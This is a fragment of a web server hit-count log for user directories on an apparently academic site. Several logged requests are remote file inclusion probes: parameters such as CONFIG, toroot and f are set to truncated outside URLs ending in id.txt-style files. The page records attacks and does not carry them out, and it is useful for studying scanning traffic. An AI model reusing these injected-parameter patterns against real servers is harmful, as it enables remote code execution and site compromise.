/~mason/Mason/sources/lostpw.php?CONFIG[pa ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason_f//photo_comment.php?toroot= ... ges/idfx1.txt??: 2 Time(s)
/~mason/Mason_f/M96SC10.pdf//?f=http://www ... ia/Roseid.txtt?: 1 Time(s)
/~mason/Mason_f/MailOrder.html: 1 Time(s)
/~mason/Mason_f/MorphFinalRptF03.pdf//phot ... ges/idfx1.txt??: 2 Time(s)
405 Method Not Allowed
/highlander.htm: 1 Time(s)
/~cdhall/: 1 Time(s)
/~hokiesat/: 5 Time(s)
/~mason/: 2 Time(s)